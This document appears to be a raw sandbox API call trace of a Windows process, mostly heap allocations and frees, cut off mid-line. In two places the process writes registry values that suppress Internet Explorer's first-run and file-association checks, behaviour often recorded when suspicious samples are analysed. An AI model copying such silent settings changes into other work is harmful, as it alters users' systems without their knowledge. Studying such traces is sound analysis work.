[0316.280] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x482220 [0316.280] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4848c8 [0316.280] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4843a8 [0316.281] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484608 [0316.281] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484628 [0316.281] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484588 [0316.281] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x48db98 [0316.281] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x48) returned 0x492018 [0316.283] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2 [0316.283] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x48d8c8 [0316.283] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x48) returned 0x492248 [0316.284] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2 [0316.307] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479bc0 [0316.307] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x64) returned 0x4919f0 [0316.307] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4821a8 [0316.308] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479bc0) returned 1 [0316.308] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x482248 [0316.308] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x484488 [0316.308] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa) returned 0x4813c8 [0316.308] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x48) returned 0x492338 [0316.308] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x494ef8 [0316.309] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xa) returned 0x494e80 [0316.309] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.309] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x48) returned 0x4924c8 [0316.309] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x494f58 [0316.309] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x494f10 [0316.309] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x479b50 [0316.309] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484488) returned 1 [0316.505] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x482220) returned 1 [0316.505] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4848c8) returned 1 [0316.505] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4843a8) returned 1 [0316.506] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484608) returned 1 [0316.506] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484628) returned 1 [0316.506] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484588) returned 1 [0316.507] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x471a90) returned 1 [0316.572] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48aed0 [0316.572] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4951b0 [0316.573] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4951b0) returned 1 [0316.573] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x462910 [0316.573] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4845c8 [0316.573] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484548 [0316.573] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484248 [0316.573] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484288 [0316.573] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484388 [0316.574] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4842a8 [0316.574] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4951b0 [0316.574] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a99f0 [0316.574] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4951b0) returned 1 [0316.575] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6c) returned 0x498df0 [0316.575] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x494880 [0316.575] RtlRestoreLastWin32Error () returned 0x27d000 [0316.575] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x10aecd4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10aec78 | out: pulNumLanguages=0x10aecd4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10aec78) returned 1 [0316.575] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479a40 [0316.575] RtlRestoreLastWin32Error () returned 0x27d000 [0316.576] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x10aecd4, pwszLanguagesBuffer=0x479a40, pcchLanguagesBuffer=0x10aec78 | out: pulNumLanguages=0x10aecd4, pwszLanguagesBuffer=0x479a40, pcchLanguagesBuffer=0x10aec78) returned 1 [0316.576] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479a60 [0316.576] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479a40) returned 1 [0316.576] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4843a8 [0316.576] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4843a8, pulNumLanguages=0x10aecd4 | out: pulNumLanguages=0x10aecd4) returned 1 [0316.576] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4843a8) returned 1 [0316.576] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48a2d0 [0316.576] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4844e8 [0316.576] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484308 [0316.576] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4843a8 [0316.577] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4848c8 [0316.577] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4a28d0 [0316.577] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4a2bb0 [0316.577] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a32f0 [0316.578] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x36) returned 0x496010 [0316.578] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x494688 [0316.579] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494688) returned 1 [0316.579] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x4a2bf0 [0316.579] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a2bf0) returned 1 [0316.579] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x496010) returned 1 [0316.601] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x494f88 [0316.603] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x49dc78 [0316.603] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494f88) returned 1 [0316.604] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4b2d28 [0316.605] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x49de70 [0316.605] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4b2d28) returned 1 [0316.605] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x49e068 [0316.606] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x49de70) returned 1 [0316.606] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x49dc78) returned 1 [0316.607] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x54) returned 0x4939b8 [0316.607] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x4946f8 [0316.611] GetTickCount () returned 0x1e80f3c [0316.611] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\Main", ulOptions=0x0, samDesired=0x2, phkResult=0x10aebb8 | out: phkResult=0x10aebb8*=0x300) returned 0x0 [0316.612] GetProcAddress (hModule=0x77310000, lpProcName="RegSetValueExW") returned 0x77412a80 [0316.612] RegSetValueExW (in: hKey=0x300, lpValueName="IE10RunOnceLastShown", Reserved=0x0, dwType=0x4, lpData=0x10aeb1c*=0x1, cbData=0x4 | out: lpData=0x10aeb1c*=0x1) returned 0x0 [0316.614] RegCloseKey (hKey=0x300) returned 0x0 [0316.614] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a3228 [0316.614] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x492658 [0316.614] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x32) returned 0x496250 [0316.615] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x496250) returned 1 [0316.615] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a3200 [0316.615] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a3200) returned 1 [0316.616] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x492658) returned 1 [0316.617] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a3228) returned 1 [0316.624] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4946f8) returned 1 [0316.625] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4939b8) returned 1 [0316.625] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x49e068) returned 1 [0316.626] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a32f0) returned 1 [0316.626] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4844e8) returned 1 [0316.626] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484308) returned 1 [0316.626] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4843a8) returned 1 [0316.626] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4848c8) returned 1 [0316.626] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a28d0) returned 1 [0316.626] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a2bb0) returned 1 [0316.627] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48a2d0) returned 1 [0316.627] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x479b90 [0316.627] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x479b90, pulNumLanguages=0x10aecd8 | out: pulNumLanguages=0x10aecd8) returned 1 [0316.627] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479b90) returned 1 [0316.627] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479a60) returned 1 [0316.628] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x462910) returned 1 [0316.628] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4845c8) returned 1 [0316.628] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484548) returned 1 [0316.628] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484248) returned 1 [0316.628] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484288) returned 1 [0316.629] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484388) returned 1 [0316.629] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4842a8) returned 1 [0316.629] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48aed0) returned 1 [0316.630] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a99f0) returned 1 [0316.650] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494880) returned 1 [0316.650] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x498df0) returned 1 [0316.745] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48acd0 [0316.745] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4813c8 [0316.746] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.746] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a3430 [0316.746] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4842a8 [0316.746] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4843a8 [0316.746] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484348 [0316.746] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484368 [0316.746] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484388 [0316.747] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484508 [0316.747] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4813c8 [0316.747] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a9310 [0316.747] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.748] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6c) returned 0x4a2ae0 [0316.748] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x4942d0 [0316.748] RtlRestoreLastWin32Error () returned 0x27d000 [0316.748] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x10aecd4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10aec78 | out: pulNumLanguages=0x10aecd4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x10aec78) returned 1 [0316.748] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479ab0 [0316.748] RtlRestoreLastWin32Error () returned 0x27d000 [0316.749] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x10aecd4, pwszLanguagesBuffer=0x479ab0, pcchLanguagesBuffer=0x10aec78 | out: pulNumLanguages=0x10aecd4, pwszLanguagesBuffer=0x479ab0, pcchLanguagesBuffer=0x10aec78) returned 1 [0316.749] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479a40 [0316.749] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479ab0) returned 1 [0316.749] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4843e8 [0316.749] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x4843e8, pulNumLanguages=0x10aecd4 | out: pulNumLanguages=0x10aecd4) returned 1 [0316.749] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4843e8) returned 1 [0316.749] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48a550 [0316.749] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4843e8 [0316.749] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4844a8 [0316.749] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484308 [0316.750] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484448 [0316.750] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484468 [0316.750] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484488 [0316.750] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a3340 [0316.751] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x36) returned 0x496010 [0316.751] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x494618 [0316.751] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494618) returned 1 [0316.751] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x484608 [0316.752] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484608) returned 1 [0316.752] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x496010) returned 1 [0316.765] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4813c8 [0316.765] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a9a20 [0316.766] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.767] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4b2d28 [0316.767] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a34b0 [0316.768] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4b2d28) returned 1 [0316.768] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x4b27a0 [0316.769] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a34b0) returned 1 [0316.770] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a9a20) returned 1 [0316.770] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x54) returned 0x494078 [0316.770] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x26) returned 0x48def8 [0316.772] GetTickCount () returned 0x1e80fd9 [0316.772] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\Main", ulOptions=0x0, samDesired=0x2, phkResult=0x10aeae0 | out: phkResult=0x10aeae0*=0x300) returned 0x0 [0316.773] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4b2cd8 [0316.773] RegSetValueExW (in: hKey=0x300, lpValueName="Check_Associations", Reserved=0x0, dwType=0x1, lpData="no", cbData=0x6 | out: lpData="no") returned 0x0 [0316.774] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4b2cd8) returned 1 [0316.774] RegCloseKey (hKey=0x300) returned 0x0 [0316.774] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a33e0 [0316.774] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x4927e8 [0316.774] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x32) returned 0x495e10 [0316.775] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x495e10) returned 1 [0316.775] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a3368 [0316.775] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a3368) returned 1 [0316.776] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4927e8) returned 1 [0316.776] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a33e0) returned 1 [0316.781] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48def8) returned 1 [0316.781] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494078) returned 1 [0316.782] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4b27a0) returned 1 [0316.783] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a3340) returned 1 [0316.783] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4843e8) returned 1 [0316.783] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4844a8) returned 1 [0316.783] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484308) returned 1 [0316.783] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484448) returned 1 [0316.784] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484468) returned 1 [0316.784] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484488) returned 1 [0316.784] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48a550) returned 1 [0316.784] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x479be0 [0316.784] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x479be0, pulNumLanguages=0x10aecd8 | out: pulNumLanguages=0x10aecd8) returned 1 [0316.785] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479be0) returned 1 [0316.785] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479a40) returned 1 [0316.785] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a3430) returned 1 [0316.785] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4842a8) returned 1 [0316.785] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4843a8) returned 1 [0316.786] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484348) returned 1 [0316.786] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484368) returned 1 [0316.786] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484388) returned 1 [0316.786] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484508) returned 1 [0316.787] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48acd0) returned 1 [0316.787] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a9310) returned 1 [0316.791] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4942d0) returned 1 [0316.791] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a2ae0) returned 1 Thread: id = 88 os_tid = 0x164c [0316.316] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48a8d0 [0316.316] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x494f28 [0316.316] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494f28) returned 1 [0316.317] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x482310 [0316.317] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4843c8 [0316.317] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484268 [0316.317] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484428 [0316.317] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4842e8 [0316.317] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4845e8 [0316.317] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x5e) returned 0x48b490 [0316.317] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x52) returned 0x493e38 [0316.318] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x493e38) returned 1 [0316.318] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x4845a8 [0316.318] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4845a8) returned 1 [0316.319] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48b490) returned 1 [0316.322] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x494e20 [0316.322] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x493260 [0316.322] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4950f0 [0316.323] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4950f0) returned 1 [0316.323] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494e20) returned 1 [0316.323] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479b00 [0316.323] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x484348 [0316.323] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479b00) returned 1 [0316.324] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x494228 [0316.324] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484348) returned 1 [0316.324] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc8) returned 0x4976a8 [0316.325] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4976a8) returned 1 [0316.325] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x30) returned 0x494298 [0316.326] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494298) returned 1 [0316.326] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x7c) returned 0x490558 [0316.326] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494228) returned 1 [0316.327] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x490558) returned 1 [0316.329] memcpy (in: _Dst=0x112e768, _Src=0x49760e, _Size=0x4 | out: _Dst=0x112e768) returned 0x112e768 [0316.330] memcpy (in: _Dst=0x112e768, _Src=0x496f1b, _Size=0x4 | out: _Dst=0x112e768) returned 0x112e768 [0316.330] memcpy (in: _Dst=0x112e768, _Src=0x496f1f, _Size=0x2 | out: _Dst=0x112e768) returned 0x112e768 [0316.330] memcpy (in: _Dst=0x112e768, _Src=0x496f21, _Size=0x2 | out: _Dst=0x112e768) returned 0x112e768 [0316.330] memcpy (in: _Dst=0x112e768, _Src=0x496f23, _Size=0x2 | out: _Dst=0x112e768) returned 0x112e768 [0316.335] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x84) returned 0x497730 [0316.335] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x482608 [0316.335] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x482608) returned 1 [0316.335] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x72) returned 0x48a350 [0316.336] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48a350) returned 1 [0316.337] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x497730) returned 1 [0316.351] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xb8) returned 0x498a00 [0316.351] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x48d958 [0316.358] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x479b00 [0316.358] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x498dc0 [0316.358] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x494f28 [0316.358] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494f28) returned 1 [0316.358] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x499210 [0316.358] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x48dc88 [0316.358] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, 